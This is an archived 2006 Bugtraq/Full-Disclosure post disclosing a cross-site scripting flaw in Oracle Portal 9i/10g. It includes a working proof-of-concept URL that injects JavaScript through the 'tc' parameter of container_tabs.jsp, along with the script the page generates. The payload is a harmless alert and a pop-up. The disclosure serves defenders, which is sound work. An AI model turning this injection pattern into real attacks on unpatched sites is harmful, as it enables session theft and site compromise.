| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 22 Dec 2006 08:30:42 +0000
From: "putosoft softputo" <hasecorp@...mail.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Oracle Applications/Portal 9i/10g Cross Site Scripting
Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:
http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//
The following code will be generated:
---SNIPPED---
<script language=javascript>
top.null =
null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',
'null');//.render(window);
</script>
---SNIPPED---
Solution
------------
There is no solution. As a workaround, enable mod_security if it's not.
Otherwise wait 6 months/1 year for a patch from Oracle Corp.
_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con
MSN Entretenimiento. http://entretenimiento.msn.es/
Powered by blists - more mailing lists